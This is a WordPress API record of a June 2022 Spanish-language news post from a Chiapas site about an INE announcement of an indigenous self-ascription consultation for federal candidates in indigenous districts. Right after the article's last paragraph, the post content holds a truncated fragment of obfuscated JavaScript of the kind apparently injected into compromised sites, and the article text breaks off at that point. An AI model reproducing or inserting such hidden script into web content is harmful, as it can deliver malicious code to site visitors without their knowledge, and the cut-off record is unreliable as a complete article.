{"id":2918,"date":"2022-06-14T03:12:59","date_gmt":"2022-06-14T03:12:59","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2918"},"modified":"2022-06-14T03:13:00","modified_gmt":"2022-06-14T03:13:00","slug":"se-realizara-consulta-indigena-de-auto-adscripcion-calificada","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2918","title":{"rendered":"Se realizar\u00e1 consulta ind\u00edgena de auto adscripci\u00f3n calificada"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-13-at-5.30.27-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-2919\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-13-at-5.30.27-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-13-at-5.30.27-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-13-at-5.30.27-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-13-at-5.30.27-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Con la finalidad de definir las caracter\u00edsticas que deben cumplir las personas que aspiren a ocupar un cargo de elecci\u00f3n popular federal, en distritos ind\u00edgenas, , V\u00edctor Hugo Escobar Mu\u00f1oz, Vocal Ejecutivo del INE del Distrito 05 anunci\u00f3 la realizaci\u00f3n de la consulta ind\u00edgena de auto adscripci\u00f3n calificada que se realizar\u00e1 entre el 2 y 21 de julio de este a\u00f1o.<\/p>\n\n\n\n<p>\u201cEs un evento in\u00e9dito, un tema joven que naci\u00f3 en 2018 a trav\u00e9s de una acci\u00f3n afirmativa y tiene que ver con cu\u00e1les ser\u00edan los elementos, los requisitos de verificaci\u00f3n para poder llevar a cabo de manera aut\u00e9ntica las caracter\u00edsticas de un ciudadano o ciudadana que pretende contender como candidato o candidata a un puesto de elecci\u00f3n federal, pero en distritos ind\u00edgenas, para considerarse de manera leg\u00edtima aceptado por las comunidades ind\u00edgenas es un evento consultivo\u201d, dijo en entrevista.<\/p>\n\n\n\n<p>Explic\u00f3 que este ejercicio es parte de un mandato jurisdiccional del Tribunal Electoral del Poder Judicial de la Federaci\u00f3n, que orden\u00f3 al INE que se formalizar\u00e1 a trav\u00e9s de lineamientos respectivos, para poder llevar a cabo la vinculaci\u00f3n entre un candidato y su comunidad, lo cual tiene que ver con el Art\u00edculo 2 Constitucional, para el registro de candidaturas.<\/p>\n\n\n\n<p>\u201cSon lineamientos que tendr\u00e1 que presentar el partido pol\u00edtico nacional, tiene que demostrar el v\u00ednculo con la comunidad o distrito ind\u00edgena y es que existieron inconformidades en 2018, y esto trata que no se violen los derechos de las personas ind\u00edgenas que intervienen, el propio tribunal tir\u00f3 muchas candidaturas\u201d, abund\u00f3 Escobar Mu\u00f1oz.<\/p>\n\n\n\n<p>Detall\u00f3 que los lineamientos a consultar se encuentran que deba hablar la lengua materna, \u201ces un cuestionario que es de base, el propio tribunal retom\u00f3 y asent\u00f3 de manera sistematizada algunas caracter\u00edsticas que debe reunir alg\u00fan candidato, como que se haya desempe\u00f1ado en cargos tradicionales de la comunidad, actividades sociales en beneficio de la comunidad, entre otros\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- Con la finalidad de definir las caracter\u00edsticas que deben cumplir las personas que aspiren a ocupar un cargo de elecci\u00f3n popular federal, en distritos ind\u00edgenas, , V\u00edctor Hugo Escobar Mu\u00f1oz, Vocal Ejecutivo del INE del Distrito 05 anunci\u00f3 la realizaci\u00f3n de la consulta ind\u00edgena de auto adscripci\u00f3n calificada &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2919,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-2918","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2918","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2918"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2918\/revisions"}],"predecessor-version":[{"id":2920,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2918\/revisions\/2920"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2919"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2918"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2918"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2918"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}